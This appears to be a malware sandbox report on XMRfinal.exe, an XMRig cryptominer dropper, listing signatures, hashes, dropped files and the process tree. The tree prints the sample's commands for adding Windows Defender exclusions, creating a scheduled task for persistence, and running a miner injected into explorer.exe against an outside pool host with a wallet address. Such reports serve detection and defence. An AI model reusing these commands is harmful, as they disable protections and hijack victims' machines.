Overview

overview

10

Static

static

5

59acf29870...18.exe

windows7-x64

10

59acf29870...18.exe

windows10-2004-x64

10

Adobe-GenP-2.7.exe

windows7-x64

3

Adobe-GenP-2.7.exe

windows10-2004-x64

3

ETC1final.exe

windows7-x64

8

ETC1final.exe

windows10-2004-x64

8

XMRfinal.exe

windows7-x64

8

XMRfinal.exe

windows10-2004-x64

10

update.exe

windows7-x64

10

update.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-10-2024 22:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    XMRfinal.exe

  • Size

    45KB

  • MD5

    34c74daeeaf8a3aab61553a507b329c7

  • SHA1

    8a28ede427de7fc4088a8ababe018c2284b93c2b

  • SHA256

    8ad91fe964e0a868a0260a6142a94a2b7fa930be6d79fff4dbe199f38f7be17b

  • SHA512

    114571ba25987bdbdb623d233bd9f52b9ff049ce52723cc0e68d715eed633c62b604e95ec8191e2bda10fe6aaa55d63ccbc1f9af36f2a6d11d2ac744ee2adf73

  • SSDEEP

    768:rkbsy4kAcpYHEX1DwaLwRpeP5YlsDpqcO6TlJmOh4bIDX3aan2yyhYnLNqgXi2f:4bsVcbNGcpjO4jmI4sKjyBNfXzf

Score
10/10
xmrigexecutionminer

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 7 IoCs
    miner
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\XMRfinal.exe
    "C:\Users\Admin\AppData\Local\Temp\XMRfinal.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2920
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1608
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4824
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1016
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2760
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3920
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\XMRfinal.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1540
      • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
        C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\XMRfinal.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4932
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2892
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:3156
        • C:\Windows\system32\services64.exe
          "C:\Windows\system32\services64.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4672
          • C:\Windows\system32\cmd.exe
            "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:5056
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2024
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3848
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5032
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3592
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:464
            • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
              C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in System32 directory
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2044
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:4972
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                  8⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:2704
              • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                7⤵
                • Executes dropped EXE
                PID:4280
              • C:\Windows\explorer.exe
                C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xm32.sytes.net:3333 --user=42WzHajZYgxRN4QzQPKRQb55kWV73KbJF2RF2APYi5wWLdHnsCCjBSiTw5RAvGQyARYJV6KCFLp8BfKATvhBbERpUqrPFAE --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6MwWH/E8SWd448Nij92PUK8=" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=90 --nicehash --tls --cinit-stealth
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2268
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:4272
                • C:\Windows\system32\choice.exe
                  choice /C Y /N /D Y /T 3
                  8⤵
                    PID:4312
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3444
            • C:\Windows\system32\choice.exe
              choice /C Y /N /D Y /T 3
              5⤵
                PID:4556

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.log
        Filesize

        539B

        MD5

        b245679121623b152bea5562c173ba11

        SHA1

        47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

        SHA256

        73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

        SHA512

        75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        10890cda4b6eab618e926c4118ab0647

        SHA1

        1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

        SHA256

        00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

        SHA512

        a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        4165c906a376e655973cef247b5128f1

        SHA1

        c6299b6ab8b2db841900de376e9c4d676d61131e

        SHA256

        fb0b3c822d300abbb892e6f218d6b4b62b80bb26d9184d1f4c731600053a3fc4

        SHA512

        15783f2d3687388339c06423bd18c17a5704cd367bf1a1d08e436088984c0b5c52dc88d3b8455495a8051ba9f977aae34b69453e5ee252d928e74dcdebd4a11a

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        6d42b6da621e8df5674e26b799c8e2aa

        SHA1

        ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

        SHA256

        5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

        SHA512

        53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        47605a4dda32c9dff09a9ca441417339

        SHA1

        4f68c895c35b0dc36257fc8251e70b968c560b62

        SHA256

        e6254c2bc9846a76a4567ab91b6eae76e937307ff9301b65d577ffe6e15fe40a

        SHA512

        b6823b6e794a2fe3e4c4ecfb3f0d61a54821de7feb4f9e3e7fd463e7fbb5e6848f59865b487dafebeac431e4f4db81ef56836d94cac67da39852c566ed34a885

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        f18cdd5d9abaa5ed52be8004a11dc037

        SHA1

        9ba656b97d13da0d686e8757d9eaeaf735675826

        SHA256

        53b358ebb88b3f7adcf45de224a5f9fbfb7d98c7c650afe61a4fc8e1bcc16dfb

        SHA512

        c4a771038ac2d0360d7318168a6f785db0bd1884abd0a6993b974536d0681dbef5e2df39cf781f5fbf4264a9d294bb6b905931d840289af7b81066cc8ba86a7e

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        34f595487e6bfd1d11c7de88ee50356a

        SHA1

        4caad088c15766cc0fa1f42009260e9a02f953bb

        SHA256

        0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

        SHA512

        10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        6d14ccefeb263594e60b1765e131f7a3

        SHA1

        4a9ebdc0dff58645406c40b7b140e1b174756721

        SHA256

        57cd435c8b2bf10a2c77698301789c032e1b6b623ff1420c72e8bca0b10f1e5c

        SHA512

        2013a26123f72a4106524fd9d7389ac4654f97033d22707efc084fb2a3ad01c298eb64f01bb64861ab603615022dbe7cfc97475346edb16b3ba72e905127f101

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eoc1v5pg.1wy.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
        Filesize

        37KB

        MD5

        2398af19987fa42ea0b0af39f971dac0

        SHA1

        e2d74b1bb2d7dd705c95be5e9c28dd7a2ba5e646

        SHA256

        716849b27ea4000c6711238980d7de59adda3cf0dcd5055b06d84b361f6402f2

        SHA512

        0eb926162a4fdbb9a0ea31ba49ad9e8deb5bf6faece4bf0785c46a83d405464294ec38aa4d08104de892219d1a3d8c9c87885c7d9629e792d8aec1168338296f

        Download Submit

      • C:\Windows\System32\Microsoft\Libs\sihost64.exe
        Filesize

        7KB

        MD5

        56da2835319cea01989c1c9974e3d92d

        SHA1

        6af5d3e866a1d84149aaed7866cbcd81bbbf1997

        SHA256

        d4671ce89aad24e2d2dd69afdc41d9b917e5aadeca4a1d0d3f41f0a2ed20748b

        SHA512

        275fdf1a5ee1b5010896c342acac1b3062908c574be5cb865afe9608017cef09f47147d375089bfa325c038647b68a3a48f48e9c535191d6160beac8591eaba2

        Download Submit

      • C:\Windows\System32\services64.exe
        Filesize

        45KB

        MD5

        34c74daeeaf8a3aab61553a507b329c7

        SHA1

        8a28ede427de7fc4088a8ababe018c2284b93c2b

        SHA256

        8ad91fe964e0a868a0260a6142a94a2b7fa930be6d79fff4dbe199f38f7be17b

        SHA512

        114571ba25987bdbdb623d233bd9f52b9ff049ce52723cc0e68d715eed633c62b604e95ec8191e2bda10fe6aaa55d63ccbc1f9af36f2a6d11d2ac744ee2adf73

        Download Submit

      • memory/2268-148-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/2268-146-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/2268-149-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/2268-147-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/2268-142-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/2268-143-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/2268-144-0x0000000002470000-0x0000000002490000-memory.dmp

        Filesize

        128KB

        Download

      • memory/2268-145-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/2920-0-0x00007FFEAEFA3000-0x00007FFEAEFA5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2920-58-0x00007FFEAEFA0000-0x00007FFEAFA61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2920-54-0x00007FFEAEFA3000-0x00007FFEAEFA5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2920-55-0x00007FFEAEFA0000-0x00007FFEAFA61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2920-2-0x00007FFEAEFA0000-0x00007FFEAFA61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2920-1-0x0000000000310000-0x0000000000320000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4280-140-0x00000000007C0000-0x00000000007C6000-memory.dmp

        Filesize

        24KB

        Download

      • memory/4824-19-0x00007FFEAEFA0000-0x00007FFEAFA61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4824-18-0x0000028843CF0000-0x0000028843F0C000-memory.dmp

        Filesize

        2.1MB

        Download

      • memory/4824-15-0x00007FFEAEFA0000-0x00007FFEAFA61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4824-14-0x00007FFEAEFA0000-0x00007FFEAFA61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4824-13-0x000002882B6F0000-0x000002882B712000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4824-3-0x00007FFEAEFA0000-0x00007FFEAFA61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4932-63-0x0000000001170000-0x0000000001182000-memory.dmp

        Filesize

        72KB

        Download

      • memory/4932-62-0x00000000007B0000-0x00000000007BE000-memory.dmp

        Filesize

        56KB

        Download